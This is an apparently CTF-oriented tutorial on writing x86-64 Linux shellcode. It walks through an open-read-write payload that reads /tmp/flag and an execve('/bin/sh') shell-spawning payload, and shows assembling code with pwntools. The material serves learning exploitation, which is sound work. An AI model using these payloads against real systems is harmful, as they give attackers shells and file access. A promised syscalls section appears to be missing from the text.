Shellcoding

This page covers the shellcode writing process.

Shellcode is a small piece of machine code used as the payload when exploiting a software vulnerability. It is named for its original purpose (launching a command shell), but it can perform various other malicious tasks, such as executing commands or taking control of a compromised system.

Why shellcoding?

Shellcode is used in system hacking to execute commands on a target machine after exploiting a vulnerability. It helps attackers gain control, escalate privileges, or inject malicious code. Because it runs directly in memory and never has to exist as a file on disk, it can evade defenses that only inspect files, which makes it a powerful tool for exploitation.

Okay now, before we start writing shellcode, we wanna explore a new assembly/computer architecture concept (sorry)

Syscalls

Now that we know all about syscalls, we can start exploring what types of shellcode we have and what syscalls we need to execute.

Types of shellcode

We'll explore two types of shellcode: ORW and Execve. Let's get into it!

ORW (Open-Read-Write) Shellcoding

ORW (open-read-write) shellcode, as the name suggests, opens a file, reads it, and writes its contents to the screen. The goal of this section is to write shellcode that reads the file "/tmp/flag".

The behavior of the shellcode can be expressed as C-like pseudocode:

char buf[0x30];

int fd = open("/tmp/flag", O_RDONLY, NULL);
read(fd, buf, 0x30);
write(1, buf, 0x30);
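
To see the same open-read-write sequence run before we drop down to assembly, here is a minimal Python sketch using the os module's thin wrappers around these calls. The helper name orw and the scratch file are assumptions for illustration; the sketch reads a temporary file instead of /tmp/flag so it runs anywhere.

```python
import os
import tempfile

def orw(path, count=0x30):
    """Open path read-only, read up to count bytes, and write them to stdout."""
    fd = os.open(path, os.O_RDONLY)   # open(path, O_RDONLY)
    try:
        buf = os.read(fd, count)      # read(fd, buf, count)
    finally:
        os.close(fd)
    os.write(1, buf)                  # write(1, buf, len(buf))
    return buf

# Demo on a scratch file standing in for /tmp/flag (hypothetical contents).
with tempfile.NamedTemporaryFile(delete=False) as f:
    f.write(b"flag{example}\n")
    demo_path = f.name

demo_data = orw(demo_path)
os.unlink(demo_path)
```

Unlike the pseudocode, this sketch writes only the bytes that were actually read rather than a fixed 0x30.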

The syscalls needed to write the ORW shellcode are listed below.

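| syscall | rax  | arg0 (rdi)           | arg1 (rsi)      | arg2 (rdx)   |
|---------|------|----------------------|-----------------|--------------|
| read    | 0x00 | unsigned int fd      | char *buf       | size_t count |
| write   | 0x01 | unsigned int fd      | const char *buf | size_t count |
| open    | 0x02 | const char *filename | int flags       | umode_t mode |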
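
One way to read the table: the syscall number goes in rax, and the arguments go in rdi, rsi, and rdx in that order. The sketch below just turns that rule into a lookup. The helper name syscall_registers is hypothetical, and "buf" is a symbolic placeholder rather than a real address.

```python
# Syscall numbers from the table above (x86-64 Linux).
SYSCALL_NUMBERS = {"read": 0x00, "write": 0x01, "open": 0x02}

# Registers that carry the first three syscall arguments, in order.
ARG_REGISTERS = ("rdi", "rsi", "rdx")

def syscall_registers(name, *args):
    """Return the register values to set before executing `syscall`."""
    if len(args) > len(ARG_REGISTERS):
        raise ValueError("this sketch only handles up to three arguments")
    regs = {"rax": SYSCALL_NUMBERS[name]}
    regs.update(zip(ARG_REGISTERS, args))
    return regs

# write(1, buf, 0x30)
print(syscall_registers("write", 1, "buf", 0x30))
```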

int fd = open("/tmp/flag", O_RDONLY, NULL)

The first step is to place the string "/tmp/flag" in memory. This is done by pushing the value 0x67616c662f706d742f (the bytes of "/tmp/flag" read as a little-endian integer) onto the stack. Since push works in 8-byte units, the value is split in two: push 0x67 first, then push 0x616c662f706d742f. The upper bytes of the first push are zero, so they also serve as the string's null terminator. A 64-bit immediate cannot be pushed directly, so the second value is loaded into rax and pushed from there. Finally, copy rsp into rdi so that rdi points to the string.
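
Working out these constants by hand gets error-prone, so here is a small Python sketch that derives them. The helper name push_chunks is hypothetical; it appends the null terminator, pads to a multiple of 8 bytes, and returns the values in the order they should be pushed.

```python
def push_chunks(s):
    """Split a C string into 8-byte little-endian values, in push order."""
    data = s + b"\x00"                    # C strings need a null terminator
    data += b"\x00" * (-len(data) % 8)    # pad to a multiple of 8 bytes
    chunks = [int.from_bytes(data[i:i + 8], "little")
              for i in range(0, len(data), 8)]
    return chunks[::-1]                   # the stack grows down: push the tail first

for value in push_chunks(b"/tmp/flag"):
    print(hex(value))
# 0x67
# 0x616c662f706d742f
```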

Since O_RDONLY is 0, set the rsi register to 0.

// <https://code.woboq.org/userspace/glibc/bits/fcntl.h.html#24>
/* File access modes for `open' and `fcntl'.  */

#define        O_RDONLY        0        /* Open read-only.  */
#define        O_WRONLY        1        /* Open write-only.  */
#define        O_RDWR          2        /* Open read/write.  */

The mode argument only matters when open creates a file (for example with O_CREAT), so for a read-only open it is ignored; set rdx to 0.

Finally, set rax to 2, the syscall number of open.

push 0x67
mov rax, 0x616c662f706d742f
push rax
mov rdi, rsp    ; rdi = "/tmp/flag"
xor rsi, rsi    ; rsi = 0 ; O_RDONLY
xor rdx, rdx    ; rdx = 0
mov rax, 2      ; rax = 2 ; syscall_open
syscall         ; open("/tmp/flag", O_RDONLY, NULL)

read(fd, buf, 0x30)

The return value of the open syscall is stored in rax, so rax now holds the fd. Copy rax to rdi to make it the first argument of read.

rsi points to the buffer that receives the data read from the file. Since 0x30 bytes will be read, set rsi to rsp-0x30.

Set rdx to 0x30, the length of the data to be read from the file.

Set rax to 0 to call the read system call.

mov rdi, rax      ; rdi = fd
mov rsi, rsp
sub rsi, 0x30     ; rsi = rsp-0x30 ; buf
mov rdx, 0x30     ; rdx = 0x30     ; len
mov rax, 0x0      ; rax = 0        ; syscall_read
syscall           ; read(fd, buf, 0x30)

A file descriptor (fd) is a handle that Unix-like operating systems provide to a process for accessing files. Each process has its own descriptor table in which its file descriptors are stored. Each descriptor is identified by a number: by convention 0 is standard input (STDIN), 1 is standard output (STDOUT), and 2 is standard error (STDERR). These three descriptors usually connect the process to the terminal, which lets us pass input to the process from the keyboard and see its output on the terminal. After a process is created, each file it opens with a function or system call such as open is typically assigned the next free descriptor, starting from 3. The process then accesses the file through that fd.
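
We can watch descriptor numbers being handed out with a few lines of Python. This is a minimal sketch: the helper name open_two and the scratch files are assumptions for illustration. On a freshly started interpreter the two numbers are often 3 and 4, though anything the process already has open shifts them.

```python
import os
import tempfile

def open_two(path_a, path_b):
    """Open two files and return their descriptor numbers."""
    fd_a = os.open(path_a, os.O_RDONLY)
    fd_b = os.open(path_b, os.O_RDONLY)
    try:
        return fd_a, fd_b
    finally:
        os.close(fd_a)
        os.close(fd_b)

# Two scratch files (hypothetical; any readable paths would do)
scratch = [tempfile.NamedTemporaryFile(delete=False) for _ in range(2)]
for f in scratch:
    f.close()

fd_a, fd_b = open_two(scratch[0].name, scratch[1].name)
print(fd_a, fd_b)

for f in scratch:
    os.unlink(f.name)
```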

write(1, buf, 0x30)

Since the output needs to be directed to stdout (the screen), set rdi to 0x1.

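rsi and rdx keep the values set for read: the syscall instruction preserves them (the kernel only clobbers rax, rcx, and r11), so they do not need to be set again.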

Set rax to 1 to call the write system call.

mov rdi, 1        ; rdi = 1 ; fd = stdout
mov rax, 0x1      ; rax = 1 ; syscall_write
syscall           ; write(fd, buf, 0x30)

Taken together, they look like this:

;Name: orw.S

push 0x67
mov rax, 0x616c662f706d742f
push rax
mov rdi, rsp    ; rdi = "/tmp/flag"
xor rsi, rsi    ; rsi = 0 ; O_RDONLY
xor rdx, rdx    ; rdx = 0
mov rax, 2      ; rax = 2 ; syscall_open
syscall         ; open("/tmp/flag", O_RDONLY, NULL)

mov rdi, rax      ; rdi = fd
mov rsi, rsp
sub rsi, 0x30     ; rsi = rsp-0x30 ; buf
mov rdx, 0x30     ; rdx = 0x30     ; len
mov rax, 0x0      ; rax = 0        ; syscall_read
syscall           ; read(fd, buf, 0x30)

mov rdi, 1        ; rdi = 1 ; fd = stdout
mov rax, 0x1      ; rax = 1 ; syscall_write
syscall           ; write(fd, buf, 0x30)

CONGRATS! You just wrote your first shellcode!!!

Execve Shellcoding

Execve shellcode launches another program, typically a shell, and consists of only the execve system call.

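| syscall | rax  | arg0 (rdi)           | arg1 (rsi)              | arg2 (rdx)              |
|---------|------|----------------------|-------------------------|-------------------------|
| execve  | 0x3b | const char *filename | const char *const *argv | const char *const *envp |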

argv is the array of arguments passed to the executable, and envp is its array of environment variables. Since we only need to run sh, both can be set to null. On Linux, the standard executables live in the /bin/ directory, which is where sh is located.

The goal is to write shellcode to run execve("/bin/sh", null, null). This is not as complex as the orw shellcode written earlier, so try writing it yourself and then compare it to the shellcode below.

;Name: execve.S

mov rax, 0x68732f6e69622f
push rax
mov rdi, rsp  ; rdi = "/bin/sh\x00"
xor rsi, rsi  ; rsi = NULL
xor rdx, rdx  ; rdx = NULL
mov rax, 0x3b ; rax = sys_execve
syscall       ; execve("/bin/sh", null, null)
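
Notice there is no explicit null terminator here. A quick Python check shows why: "/bin/sh" is only 7 bytes, so the top byte of the 8-byte register is zero and lands right after the string in memory. The variable names are just for illustration.

```python
value = 0x68732f6e69622f

# push rax stores all 8 bytes of the register, least significant byte first
stored = value.to_bytes(8, "little")
print(stored)   # b'/bin/sh\x00'

# What a C string reader sees: everything up to the first null byte
path = stored.split(b"\x00", 1)[0]
print(path)     # b'/bin/sh'
```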

Compiling Assembly into Shellcode with Pwntools

Use the asm() function from pwntools to assemble assembly code into shellcode:

from pwn import *

# asm() assembles for 32-bit x86 (i386) by default, so select x86-64 first
context.arch = "amd64"

assembly_code = """
    xor rax, rax
    mov al, 60
    xor rdi, rdi
    syscall
"""

shellcode = asm(assembly_code)
print(shellcode.hex())  # Prints shellcode in hex format

This script assembles the code, here a call to exit(0) (syscall number 60), into raw shellcode bytes that can be used in an exploit.
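
A hex string is handy for inspection, but exploits and C test harnesses often want the bytes as an escaped string literal. Here is a small stdlib-only sketch. The helper name to_c_literal is hypothetical, and the example hex is what we would expect an x86-64 assembler to emit for the four instructions above, so treat it as an assumption and compare it against your own output.

```python
def to_c_literal(shellcode):
    """Format raw bytes as a C-style escaped string, e.g. \\x0f\\x05."""
    return "".join(f"\\x{b:02x}" for b in shellcode)

# Assumed encoding of: xor rax, rax / mov al, 60 / xor rdi, rdi / syscall
example = bytes.fromhex("4831c0b03c4831ff0f05")
print(len(example), "bytes")
print(to_c_literal(example))
```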

References

Dreamhack is amazing guys, go read their material :))
